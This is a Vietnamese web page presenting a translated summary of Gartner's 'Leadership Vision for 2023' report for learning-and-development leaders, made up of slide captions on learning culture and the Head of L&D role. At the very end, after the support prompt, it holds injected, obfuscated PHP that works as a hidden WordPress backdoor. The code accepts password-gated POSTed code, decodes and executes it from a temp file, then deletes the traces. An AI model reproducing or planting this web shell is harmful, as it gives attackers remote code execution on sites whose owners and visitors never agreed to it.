[BÁO CÁO GARTNER 2023] LEADERSHIP VISION FOR 2023

Nguồn: Gartner
Dịch & Biên tập: GrowMind
GrowMind xin gửi tới các chuyên gia L&D bản biên tập Tiếng Việt báo cáo “Leadership Vision for 2023” của Gartner.
Bản báo cáo sẽ giúp các L&D Leaders vạch ra 3 ưu tiên hàng đầu và các hành động cần thực hiện cho năm sau.
Các nội dung được đề cập trong báo cáo:
💚Các xu hướng chính ảnh hưởng đến các L&D Leaders
💚Xây dựng văn hóa học tập hiệu quả trong môi trường làm việc hybrid
💚Các kỹ năng cần thiết của bộ phận L&D nhằm đáp ứng bối cảnh hiện tại
💚Mô hình Head of LnD theo Tiêu chuẩn quốc tế
…….
Xin mời các Anh/Chị theo dõi báo cáo dưới đây:

thoi ky bat on dinh

Bộ 3 áp lực hầu hết các nhà điều hành có thể chưa từng trải qua

chuyen dich ky vong

Sự dịch chuyển kỳ vọng của người lao động sẽ tác động đến việc thu hút và giữ chân họ

LnD leader can can bang

Giữa những biến động, LnD Leaders cần cân bằng 3 yếu tố

LnD duoc uu tien

Học tập & Phát triển (LnD) trở thành TOP 3 ưu tiên hàng đầu của các lãnh đạo trong năm 2023

lanh dao con nguoi lam trung tam

Các nhà lãnh đạo cần cách tiếp cận quản trị mới – Lấy con người làm trung tâm để đối mặt với tình trạng hiện tại

de xuat cho lnd leader

Đề xuất cho LnD Leaders để giúp các nhà lãnh đạo tiếp cận phong cách mới

mo hinh to chuc moi

Mô hình tổ chức cũng cần có sự chuyển dịch

de xuat cho lnd

LnD Leader nên làm gì để hỗ trợ sự chuyển đổi mô hình tổ chức đó

vai tro lnd

Người lao động dần trở thành những người làm chủ việc học tập,

vai trò của LnD cũng dần thay đổi

van hoa hoc tap hybrid

3 yếu tố tạo nên văn hoá học tập hiệu quả cho môi trường làm việc Hybrid

kich hoat hoc tap

3 liên kết để hỗ trợ sự phát triển trong hệ sinh thái học tập

de xuat cho lnd leader

LnD Leaders cần làm gì để đưa người lao động tham gia và làm chủ các hoạt động học tập

head of lnd quoc te

Tiêu chuẩn quốc tế của một Head of LnD

co van hoc tap

LnD Leader và các yêu cầu về năng lực cố vấn, chuyên môn

1
Bạn cần hỗ trợ?
if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}